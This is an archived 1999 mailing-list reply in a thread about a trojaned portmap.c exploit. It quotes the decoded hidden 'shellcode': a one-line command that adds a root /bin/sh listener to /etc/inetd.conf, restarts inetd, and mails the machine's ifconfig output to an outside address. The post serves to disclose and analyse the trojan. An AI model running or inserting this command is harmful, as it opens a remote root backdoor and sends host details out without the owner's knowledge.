Re: portmap.c Trojan

From: Wakko Ellington Warner-Warner III (wakkoat_private)
Date: Sat Aug 21 1999 - 18:20:55 PDT

Next message: Rogier Wolff: "Re: Insecure use of file in /tmp by trn"

Previous message: Anonymous: "(no subject)"
Maybe in reply to: goatkiller: "portmap.c Trojan"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Fri, 20 Aug 1999, goatkiller wrote:

The actual "shellcode" that gets executed follows:

/bin/echo "65139 stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf
; /bin/killall -1 inetd 2>&1 1>/dev/null ; /sbin/ifconfig -a | mail
goat187at_private 2>&1 2>/dev/null

- A.P.

--

+------------------------------------------+------------------+
| "We are a great software company. That's | NIC: AP5514   16 |
| the only image anyone should have of     | http://bitey.net |
| us." -- Bill Gates                       | wakkoat_private  |
+------------------------------------------+------------------+

Next message: Rogier Wolff: "Re: Insecure use of file in /tmp by trn"
Previous message: Anonymous: "(no subject)"
Maybe in reply to: goatkiller: "portmap.c Trojan"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:57:55 PDT